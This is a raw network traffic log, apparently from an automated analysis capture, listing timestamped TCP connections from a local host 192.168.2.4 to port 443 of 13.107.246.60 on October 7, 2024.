                Oct 7, 2024 03:27:03.253717899 CEST49863443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.253731966 CEST4434986313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.255518913 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.255539894 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.255748987 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.255748987 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.255772114 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.574124098 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.575064898 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.575100899 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.576010942 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.576025963 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.677800894 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.677851915 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.677907944 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.677918911 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.677951097 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.682883024 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.682904005 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.682985067 CEST49864443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.682991982 CEST4434986413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.727004051 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.727058887 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.727114916 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.727478981 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.727490902 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.844436884 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.845587969 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.845630884 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.847028017 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.847043037 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.892359972 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.892421007 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.893542051 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.893558025 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.894751072 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.894753933 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.895561934 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.895592928 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.896331072 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.896337986 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.912575006 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.913507938 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.913538933 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.914047956 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.914053917 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.942439079 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.942604065 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.942864895 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.943018913 CEST49865443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.943037033 CEST4434986513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.952811003 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.952860117 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.952919960 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.953716040 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.953728914 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.991569996 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.991689920 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.991729975 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.991740942 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.991787910 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.992325068 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.992341995 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.992372036 CEST49868443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.992377043 CEST4434986813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.996634960 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.996726036 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.996769905 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.999489069 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:03.999515057 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:03.999567986 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.000031948 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.000046015 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.000062943 CEST49867443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.000068903 CEST4434986713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.003515959 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.003530025 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.007281065 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.007309914 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.007361889 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.007980108 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.007992029 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.022392035 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.022468090 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.022514105 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.022979021 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.023003101 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.023017883 CEST49866443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.023025036 CEST4434986613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.030571938 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.030621052 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.030673027 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.031650066 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.031665087 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.401108027 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.402350903 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.402390003 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.403739929 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.403745890 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.505659103 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.505738974 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.505785942 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.506047010 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.506071091 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.506086111 CEST49869443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.506093979 CEST4434986913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.509253979 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.509298086 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.509392023 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.509552956 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.509567022 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.598210096 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.598716974 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.598736048 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.599283934 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.599289894 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.632941961 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.633480072 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.633498907 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.633987904 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.633991957 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.641383886 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.641748905 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.641782045 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.642316103 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.642323017 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.667524099 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.667848110 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.667881012 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.668234110 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.668241024 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.700031996 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.700102091 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.700247049 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.700392962 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.700416088 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.700442076 CEST49870443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.700450897 CEST4434987013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.703308105 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.703349113 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.703547001 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.703687906 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.703699112 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.730890989 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.731050014 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.731545925 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.731724977 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.731739998 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.731761932 CEST49871443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.731766939 CEST4434987113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.734505892 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.734536886 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.734723091 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.734967947 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.734977007 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.741710901 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.741744995 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.741795063 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.741821051 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.741964102 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.741964102 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.741980076 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.742003918 CEST49872443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.742007971 CEST4434987213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.743921995 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.743959904 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.744107008 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.744179010 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.744185925 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.768491983 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.769309998 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.769416094 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.769416094 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.771444082 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.771446943 CEST49873443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.771459103 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.771467924 CEST4434987313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:04.771625996 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.771625996 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:04.771640062 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.188572884 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.239943027 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.289659977 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.289680004 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.290124893 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.290129900 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.338644028 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.339365005 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.339396000 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.340316057 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.340322971 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.373544931 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.374213934 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.374237061 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.375061035 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.375066042 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.390541077 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.390855074 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.390908003 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.391031027 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.391031027 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.391556978 CEST49874443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.391577005 CEST4434987413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.394896030 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.394927979 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.401068926 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.401068926 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.401118040 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.404953957 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.406052113 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.406075954 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.406908035 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.406913996 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.427915096 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.428448915 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.428468943 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.430893898 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.430898905 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.437966108 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.438121080 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.439985991 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.439986944 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.440877914 CEST49875443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.440918922 CEST4434987513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.442934990 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.443027973 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.449011087 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.449224949 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.449259043 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.472336054 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.472477913 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.472537041 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.472884893 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.490827084 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.490827084 CEST49876443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.490860939 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.490874052 CEST4434987613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.493938923 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.493983984 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.494683981 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.494719028 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.494725943 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.505175114 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.505330086 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.509426117 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.530293941 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.530497074 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.530543089 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.533145905 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.533145905 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.533181906 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.533462048 CEST49877443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.533462048 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.533469915 CEST4434987713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.533484936 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.535408020 CEST49878443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.535413027 CEST4434987813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.537720919 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.537725925 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.537753105 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.537772894 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.538939953 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.539082050 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.539083004 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.539083004 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:05.539094925 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:05.539110899 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.040194988 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.040827990 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.040858030 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.041393995 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.041399956 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.101253986 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.101748943 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.101809978 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.102282047 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.102315903 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.135320902 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.135797977 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.135813951 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.136293888 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.136297941 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.138849020 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.139005899 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.139075994 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.139162064 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.139162064 CEST49879443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.139205933 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.139231920 CEST4434987913.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.142302036 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.142398119 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.142473936 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.142653942 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.142685890 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.172543049 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.173135996 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.173161983 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.173682928 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.173693895 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.178203106 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.180416107 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.180443048 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.181099892 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.181107044 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.202866077 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.203066111 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.203119040 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.203146935 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.203180075 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.203232050 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.223536015 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.223536015 CEST49880443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.223578930 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.223612070 CEST4434988013.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.233827114 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.233920097 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.233995914 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.234100103 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.234178066 CEST49885443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.234214067 CEST4434988513.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.234257936 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.234317064 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.234348059 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.234360933 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.234370947 CEST49881443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.234375954 CEST4434988113.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.236397028 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.236418009 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.236479044 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.236582041 CEST49886443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.236598015 CEST4434988613.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.271073103 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.271374941 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.271446943 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.271527052 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.271549940 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.271589041 CEST49883443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.271604061 CEST4434988313.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.274256945 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.274313927 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.274382114 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.274543047 CEST49887443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.274564981 CEST4434988713.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.276113987 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.276504040 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.276546955 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.276597023 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.276607037 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.276618004 CEST49882443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.276622057 CEST4434988213.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.278697014 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.278717995 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.278798103 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.278964043 CEST49888443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.278986931 CEST4434988813.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.783206940 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.783765078 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.783823967 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.784286976 CEST49884443192.168.2.413.107.246.60
                Oct 7, 2024 03:27:06.784300089 CEST4434988413.107.246.60192.168.2.4
                Oct 7, 2024 03:27:06.866828918 CEST4434988513.107.246.60192.168.2.4
